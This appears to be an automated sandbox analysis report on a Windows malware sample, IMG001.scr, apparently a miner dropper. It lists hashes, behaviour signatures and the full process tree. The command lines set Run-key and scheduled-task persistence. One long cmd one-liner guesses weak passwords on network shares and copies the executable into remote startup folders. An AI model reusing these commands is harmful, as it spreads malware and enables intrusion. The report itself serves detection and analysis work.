Analysis
-
max time kernel
149s -
max time network
144s -
platform
windows7_x64 -
resource
win7v20210410 -
submitted
25-05-2021 14:04
Static task
static1
Behavioral task
behavioral1
Sample
IMG001.scr
Resource
win7v20210410
Behavioral task
behavioral2
Sample
IMG001.scr
Resource
win10v20210410
General
-
Target
IMG001.scr
-
Size
3.4MB
-
MD5
fbbcf1e9501234d6661a0c9ae6dc01c9
-
SHA1
1ca9759a324159f331e79ea6871ad62040521b41
-
SHA256
d9901b16a93aad709947524379d572a7a7bf8e2741e27a1112c95977d4a6ea8c
-
SHA512
027e5ea6d92955b87439f61704de5b3e21c7a8e0a95327868951968e4f5cbed59cf1e803ac9adb2c9cf577db7a2f6fd4383b7384d57a78596cfb2ff020907140
Malware Config
Signatures
-
Executes dropped EXE 1 IoCs
Processes:
IMG001.exepid process 316 IMG001.exe -
Drops startup file 1 IoCs
Processes:
IMG001.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Run.lnk IMG001.exe -
Loads dropped DLL 7 IoCs
Processes:
IMG001.scrIMG001.exepid process 1756 IMG001.scr 316 IMG001.exe 316 IMG001.exe 316 IMG001.exe 316 IMG001.exe 316 IMG001.exe 316 IMG001.exe -
Adds Run key to start application 2 TTPs 4 IoCs
Processes:
IMG001.exereg.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Windows\CurrentVersion\Run IMG001.exe Set value (str) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Windows\CurrentVersion\Run\ = "C:\\Users\\Admin\\AppData\\Roaming\\NsMiner\\IMG001.exe" IMG001.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\ = "C:\\Users\\Admin\\AppData\\Roaming\\NsMiner\\IMG001.exe" reg.exe -
Enumerates connected drives 3 TTPs 1 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
IMG001.exedescription ioc process File opened (read-only) \??\E: IMG001.exe -
Drops file in Windows directory 1 IoCs
Processes:
schtasks.exedescription ioc process File created C:\Windows\Tasks\UAC.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
NSIS installer 8 IoCs
Processes:
resource yara_rule \Users\Admin\AppData\Roaming\NsMiner\IMG001.exe nsis_installer_1 \Users\Admin\AppData\Roaming\NsMiner\IMG001.exe nsis_installer_2 C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe nsis_installer_1 C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe nsis_installer_2 C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe nsis_installer_1 C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe nsis_installer_2 \Users\Admin\AppData\Roaming\NsMiner\IMG001.exe nsis_installer_1 \Users\Admin\AppData\Roaming\NsMiner\IMG001.exe nsis_installer_2 -
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Discovers systems in the same network 1 TTPs 2 IoCs
-
Enumerates system info in registry 2 TTPs 12 IoCs
Processes:
xcopy.exexcopy.exexcopy.exexcopy.exexcopy.exexcopy.exexcopy.exexcopy.exexcopy.exexcopy.exexcopy.exexcopy.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe -
NTFS ADS 2 IoCs
Processes:
cmd.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe:P cmd.exe File opened for modification C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe:P cmd.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 2 IoCs
-
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
powercfg.exepowercfg.exepowercfg.exedescription pid process Token: SeShutdownPrivilege 1216 powercfg.exe Token: SeShutdownPrivilege 300 powercfg.exe Token: SeShutdownPrivilege 1320 powercfg.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
IMG001.scrIMG001.execmd.execmd.execmd.execmd.execmd.execmd.exedescription pid process target process PID 1756 wrote to memory of 316 1756 IMG001.scr IMG001.exe PID 1756 wrote to memory of 316 1756 IMG001.scr IMG001.exe PID 1756 wrote to memory of 316 1756 IMG001.scr IMG001.exe PID 1756 wrote to memory of 316 1756 IMG001.scr IMG001.exe PID 316 wrote to memory of 904 316 IMG001.exe cmd.exe PID 316 wrote to memory of 904 316 IMG001.exe cmd.exe PID 316 wrote to memory of 904 316 IMG001.exe cmd.exe PID 316 wrote to memory of 904 316 IMG001.exe cmd.exe PID 316 wrote to memory of 368 316 IMG001.exe cmd.exe PID 316 wrote to memory of 368 316 IMG001.exe cmd.exe PID 316 wrote to memory of 368 316 IMG001.exe cmd.exe PID 316 wrote to memory of 368 316 IMG001.exe cmd.exe PID 316 wrote to memory of 1512 316 IMG001.exe cmd.exe PID 316 wrote to memory of 1512 316 IMG001.exe cmd.exe PID 316 wrote to memory of 1512 316 IMG001.exe cmd.exe PID 316 wrote to memory of 1512 316 IMG001.exe cmd.exe PID 316 wrote to memory of 812 316 IMG001.exe cmd.exe PID 316 wrote to memory of 812 316 IMG001.exe cmd.exe PID 316 wrote to memory of 812 316 IMG001.exe cmd.exe PID 316 wrote to memory of 812 316 IMG001.exe cmd.exe PID 904 wrote to memory of 1768 904 cmd.exe reg.exe PID 904 wrote to memory of 1768 904 cmd.exe reg.exe PID 904 wrote to memory of 1768 904 cmd.exe reg.exe PID 904 wrote to memory of 1768 904 cmd.exe reg.exe PID 368 wrote to memory of 1212 368 cmd.exe schtasks.exe PID 368 wrote to memory of 1212 368 cmd.exe schtasks.exe PID 368 wrote to memory of 1212 368 cmd.exe schtasks.exe PID 368 wrote to memory of 1212 368 cmd.exe schtasks.exe PID 1512 wrote to memory of 308 1512 cmd.exe schtasks.exe PID 1512 wrote to memory of 308 1512 cmd.exe schtasks.exe PID 1512 wrote to memory of 308 1512 cmd.exe schtasks.exe PID 1512 wrote to memory of 308 1512 cmd.exe schtasks.exe PID 812 wrote to memory of 1216 812 cmd.exe powercfg.exe PID 812 wrote to memory of 1216 812 cmd.exe powercfg.exe PID 812 wrote to memory of 1216 812 cmd.exe powercfg.exe PID 812 wrote to memory of 1216 812 cmd.exe powercfg.exe PID 812 wrote to memory of 300 812 cmd.exe powercfg.exe PID 812 wrote to memory of 300 812 cmd.exe powercfg.exe PID 812 wrote to memory of 300 812 cmd.exe powercfg.exe PID 812 wrote to memory of 300 812 cmd.exe powercfg.exe PID 812 wrote to memory of 1320 812 cmd.exe powercfg.exe PID 812 wrote to memory of 1320 812 cmd.exe powercfg.exe PID 812 wrote to memory of 1320 812 cmd.exe powercfg.exe PID 812 wrote to memory of 1320 812 cmd.exe powercfg.exe PID 316 wrote to memory of 436 316 IMG001.exe cmd.exe PID 316 wrote to memory of 436 316 IMG001.exe cmd.exe PID 316 wrote to memory of 436 316 IMG001.exe cmd.exe PID 316 wrote to memory of 436 316 IMG001.exe cmd.exe PID 436 wrote to memory of 752 436 cmd.exe cmd.exe PID 436 wrote to memory of 752 436 cmd.exe cmd.exe PID 436 wrote to memory of 752 436 cmd.exe cmd.exe PID 436 wrote to memory of 752 436 cmd.exe cmd.exe PID 752 wrote to memory of 1380 752 cmd.exe net.exe PID 752 wrote to memory of 1380 752 cmd.exe net.exe PID 752 wrote to memory of 1380 752 cmd.exe net.exe PID 752 wrote to memory of 1380 752 cmd.exe net.exe PID 752 wrote to memory of 592 752 cmd.exe find.exe PID 752 wrote to memory of 592 752 cmd.exe find.exe PID 752 wrote to memory of 592 752 cmd.exe find.exe PID 752 wrote to memory of 592 752 cmd.exe find.exe PID 752 wrote to memory of 2008 752 cmd.exe ARP.EXE PID 752 wrote to memory of 2008 752 cmd.exe ARP.EXE PID 752 wrote to memory of 2008 752 cmd.exe ARP.EXE PID 752 wrote to memory of 2008 752 cmd.exe ARP.EXE
Processes
-
C:\Users\Admin\AppData\Local\Temp\IMG001.scr"C:\Users\Admin\AppData\Local\Temp\IMG001.scr" /S1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1756 -
C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"2⤵
- Executes dropped EXE
- Drops startup file
- Loads dropped DLL
- Adds Run key to start application
- Enumerates connected drives
- Suspicious use of WriteProcessMemory
PID:316 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "" /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" /t REG_SZ3⤵
- Suspicious use of WriteProcessMemory
PID:904 -
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "" /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" /t REG_SZ4⤵
- Adds Run key to start application
PID:1768 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c schtasks /create /tn "UAC" /SC ONLOGON /F /RL HIGHEST /TR "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"3⤵
- Suspicious use of WriteProcessMemory
PID:368 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "UAC" /SC ONLOGON /F /RL HIGHEST /TR "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"4⤵
- Creates scheduled task(s)
PID:1212 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c schtasks /create /tn "UAC" /RU "SYSTEM" /SC ONLOGON /F /V1 /RL HIGHEST /TR "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"3⤵
- Suspicious use of WriteProcessMemory
PID:1512 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "UAC" /RU "SYSTEM" /SC ONLOGON /F /V1 /RL HIGHEST /TR "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"4⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:308 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c powercfg /CHANGE -standby-timeout-ac 0 & powercfg /CHANGE -hibernate-timeout-ac 0 & Powercfg -SetAcValueIndex 381b4222-f694-41f0-9685-ff5bb260df2e 4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c936 0003⤵
- Suspicious use of WriteProcessMemory
PID:812 -
C:\Windows\SysWOW64\powercfg.exepowercfg /CHANGE -standby-timeout-ac 04⤵
- Suspicious use of AdjustPrivilegeToken
PID:1216 -
C:\Windows\SysWOW64\powercfg.exepowercfg /CHANGE -hibernate-timeout-ac 04⤵
- Suspicious use of AdjustPrivilegeToken
PID:300 -
C:\Windows\SysWOW64\powercfg.exePowercfg -SetAcValueIndex 381b4222-f694-41f0-9685-ff5bb260df2e 4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c936 0004⤵
- Suspicious use of AdjustPrivilegeToken
PID:1320 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /v:on /c @(for /f "usebackq tokens=1" %i in (`@net view^|find /i "\\" ^|^| @arp -a^|find /i " 1"`) do @set str_!random!=%i)& @for /f "usebackq tokens=1* delims==" %j in (`set str_`) do @set s=%k& set s=!s:\\=!& set l=!s:-PC=!& set l=!l:-ÏÊ=!& set f=IMG001.exe& set n=1702& @if not "!s!"=="%COMPUTERNAME%" @echo connect to \\!s! & (for /f "usebackq tokens=1" %j in (`net view \\!s!^|find /i " "`) do @echo f|xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\!s!\%j\!f!" 1>nul && @echo copy to "\\!s!\%j\!f!") & @net use * /delete /y 2>nul & @(for %u in (1 !l! administrator user admin àäìèíèñòðàòîð) do @for %p in (0 1 123 %u !n! "") do @ping -n 3 localhost>nul & @(for %c in (\\!s!\C$ \\!s!\Users) do @echo connect to %c %p %u & @(if not "%p%u"=="01" net use %c "%p" /user:"%u") && @((echo [Section1] & echo p=%p %u)>"C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe:P" & @(for %d in ("%c\All Users\Microsoft\Windows\Start Menu\Programs\Startup\!f!" "%c\%u\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\!f!" "%c\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\!f!" "%c\Users\%u\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\!f!" "%c\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\!f!" "%c\Documents and Settings\%u\Start Menu\Programs\Startup\!f!" "%c\Documents and Settings\All Users\Start Menu\Programs\Startup\!f!" "%c\Documents and Settings\%u\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\!f!" "%c\Documents and Settings\All Users\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\!f!" "%c\Windows\Profiles\%u\Start Menu\Programs\Startup\!f!" "%c\Windows\All Users\Start menu\Programs\Startup\!f!" "%c\%u\!f!" ) do @echo f|@xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" %d 1>nul && @echo copy to %d) & @echo nul>"C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe:P" & net use %c /delete /y 2>nul & @ping -n 20 localhost>nul)))3⤵
- NTFS ADS
- Suspicious use of WriteProcessMemory
PID:436 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c @net view|find /i "\\" || @arp -a|find /i " 1"4⤵
- Suspicious use of WriteProcessMemory
PID:752 -
C:\Windows\SysWOW64\net.exenet view5⤵
- Discovers systems in the same network
PID:1380 -
C:\Windows\SysWOW64\find.exefind /i "\\"5⤵PID:592
-
C:\Windows\SysWOW64\ARP.EXEarp -a5⤵PID:2008
-
C:\Windows\SysWOW64\find.exefind /i " 1"5⤵PID:2036
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c set str_4⤵PID:2032
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c net view \\10.7.0.255|find /i " "4⤵PID:1156
-
C:\Windows\SysWOW64\net.exenet view \\10.7.0.2555⤵
- Discovers systems in the same network
PID:1660 -
C:\Windows\SysWOW64\find.exefind /i " "5⤵PID:872
-
C:\Windows\SysWOW64\net.exenet use * /delete /y4⤵PID:1808
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost4⤵
- Runs ping.exe
PID:1980 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"4⤵PID:1368
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.7.0.255\C$\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.7.0.255\C$\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "4⤵PID:1336
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.7.0.255\C$\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"5⤵
- Enumerates system info in registry
PID:1068 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"4⤵PID:1372
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.7.0.255\C$\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.7.0.255\C$\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "4⤵PID:1824
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.7.0.255\C$\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"5⤵
- Enumerates system info in registry
PID:1364 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"4⤵PID:1620
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.7.0.255\C$\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.7.0.255\C$\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "4⤵PID:1852
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.7.0.255\C$\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"5⤵
- Enumerates system info in registry
PID:916 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"4⤵PID:1764
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.7.0.255\C$\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.7.0.255\C$\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "4⤵PID:608
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.7.0.255\C$\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"5⤵
- Enumerates system info in registry
PID:1532 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"4⤵PID:888
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.7.0.255\C$\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.7.0.255\C$\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "4⤵PID:1112
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.7.0.255\C$\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"5⤵
- Enumerates system info in registry
PID:1324 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"4⤵PID:1096
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.7.0.255\C$\Documents and Settings\1\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.7.0.255\C$\Documents and Settings\1\Start Menu\Programs\Startup\IMG001.exe" "4⤵PID:1684
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.7.0.255\C$\Documents and Settings\1\Start Menu\Programs\Startup\IMG001.exe"5⤵
- Enumerates system info in registry
PID:1076 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"4⤵PID:664
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.7.0.255\C$\Documents and Settings\All Users\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.7.0.255\C$\Documents and Settings\All Users\Start Menu\Programs\Startup\IMG001.exe" "4⤵PID:820
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.7.0.255\C$\Documents and Settings\All Users\Start Menu\Programs\Startup\IMG001.exe"5⤵
- Enumerates system info in registry
PID:1524 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"4⤵PID:1648
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.7.0.255\C$\Documents and Settings\1\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe" 1>nul && @ echo copy to "\\10.7.0.255\C$\Documents and Settings\1\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe" "4⤵PID:1432
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.7.0.255\C$\Documents and Settings\1\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe"5⤵
- Enumerates system info in registry
PID:1964 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"4⤵PID:1380
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.7.0.255\C$\Documents and Settings\All Users\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe" 1>nul && @ echo copy to "\\10.7.0.255\C$\Documents and Settings\All Users\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe" "4⤵PID:1160
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.7.0.255\C$\Documents and Settings\All Users\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe"5⤵
- Enumerates system info in registry
PID:1672 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"4⤵PID:2036
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.7.0.255\C$\Windows\Profiles\1\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.7.0.255\C$\Windows\Profiles\1\Start Menu\Programs\Startup\IMG001.exe" "4⤵PID:2012
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.7.0.255\C$\Windows\Profiles\1\Start Menu\Programs\Startup\IMG001.exe"5⤵
- Enumerates system info in registry
PID:1052 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"4⤵PID:1840
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.7.0.255\C$\Windows\All Users\Start menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.7.0.255\C$\Windows\All Users\Start menu\Programs\Startup\IMG001.exe" "4⤵PID:868
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.7.0.255\C$\Windows\All Users\Start menu\Programs\Startup\IMG001.exe"5⤵
- Enumerates system info in registry
PID:1156 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"4⤵PID:1644
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.7.0.255\C$\1\IMG001.exe" 1>nul && @ echo copy to "\\10.7.0.255\C$\1\IMG001.exe" "4⤵PID:1808
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.7.0.255\C$\1\IMG001.exe"5⤵
- Enumerates system info in registry
PID:1552 -
C:\Windows\SysWOW64\net.exenet use \\10.7.0.255\C$ /delete /y4⤵PID:1960
-
C:\Windows\SysWOW64\PING.EXEping -n 20 localhost4⤵
- Runs ping.exe
PID:1844
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
MD5
fbbcf1e9501234d6661a0c9ae6dc01c9
SHA11ca9759a324159f331e79ea6871ad62040521b41
SHA256d9901b16a93aad709947524379d572a7a7bf8e2741e27a1112c95977d4a6ea8c
SHA512027e5ea6d92955b87439f61704de5b3e21c7a8e0a95327868951968e4f5cbed59cf1e803ac9adb2c9cf577db7a2f6fd4383b7384d57a78596cfb2ff020907140
-
MD5
fbbcf1e9501234d6661a0c9ae6dc01c9
SHA11ca9759a324159f331e79ea6871ad62040521b41
SHA256d9901b16a93aad709947524379d572a7a7bf8e2741e27a1112c95977d4a6ea8c
SHA512027e5ea6d92955b87439f61704de5b3e21c7a8e0a95327868951968e4f5cbed59cf1e803ac9adb2c9cf577db7a2f6fd4383b7384d57a78596cfb2ff020907140
-
MD5
d7a3fa6a6c738b4a3c40d5602af20b08
SHA134fc75d97f640609cb6cadb001da2cb2c0b3538a
SHA25667eff17c53a78c8ec9a28f392b9bb93df3e74f96f6ecd87a333a482c36546b3e
SHA51275cf123448567806be5f852ebf70f398da881e89994b82442a1f4bc6799894e799f979f5ab1cc9ba12617e48620e6c34f71e23259da498da37354e5fd3c0f934
-
MD5
d7a3fa6a6c738b4a3c40d5602af20b08
SHA134fc75d97f640609cb6cadb001da2cb2c0b3538a
SHA25667eff17c53a78c8ec9a28f392b9bb93df3e74f96f6ecd87a333a482c36546b3e
SHA51275cf123448567806be5f852ebf70f398da881e89994b82442a1f4bc6799894e799f979f5ab1cc9ba12617e48620e6c34f71e23259da498da37354e5fd3c0f934
-
MD5
d7a3fa6a6c738b4a3c40d5602af20b08
SHA134fc75d97f640609cb6cadb001da2cb2c0b3538a
SHA25667eff17c53a78c8ec9a28f392b9bb93df3e74f96f6ecd87a333a482c36546b3e
SHA51275cf123448567806be5f852ebf70f398da881e89994b82442a1f4bc6799894e799f979f5ab1cc9ba12617e48620e6c34f71e23259da498da37354e5fd3c0f934
-
MD5
d7a3fa6a6c738b4a3c40d5602af20b08
SHA134fc75d97f640609cb6cadb001da2cb2c0b3538a
SHA25667eff17c53a78c8ec9a28f392b9bb93df3e74f96f6ecd87a333a482c36546b3e
SHA51275cf123448567806be5f852ebf70f398da881e89994b82442a1f4bc6799894e799f979f5ab1cc9ba12617e48620e6c34f71e23259da498da37354e5fd3c0f934
-
MD5
d7a3fa6a6c738b4a3c40d5602af20b08
SHA134fc75d97f640609cb6cadb001da2cb2c0b3538a
SHA25667eff17c53a78c8ec9a28f392b9bb93df3e74f96f6ecd87a333a482c36546b3e
SHA51275cf123448567806be5f852ebf70f398da881e89994b82442a1f4bc6799894e799f979f5ab1cc9ba12617e48620e6c34f71e23259da498da37354e5fd3c0f934
-
MD5
fbbcf1e9501234d6661a0c9ae6dc01c9
SHA11ca9759a324159f331e79ea6871ad62040521b41
SHA256d9901b16a93aad709947524379d572a7a7bf8e2741e27a1112c95977d4a6ea8c
SHA512027e5ea6d92955b87439f61704de5b3e21c7a8e0a95327868951968e4f5cbed59cf1e803ac9adb2c9cf577db7a2f6fd4383b7384d57a78596cfb2ff020907140
-
MD5
fbbcf1e9501234d6661a0c9ae6dc01c9
SHA11ca9759a324159f331e79ea6871ad62040521b41
SHA256d9901b16a93aad709947524379d572a7a7bf8e2741e27a1112c95977d4a6ea8c
SHA512027e5ea6d92955b87439f61704de5b3e21c7a8e0a95327868951968e4f5cbed59cf1e803ac9adb2c9cf577db7a2f6fd4383b7384d57a78596cfb2ff020907140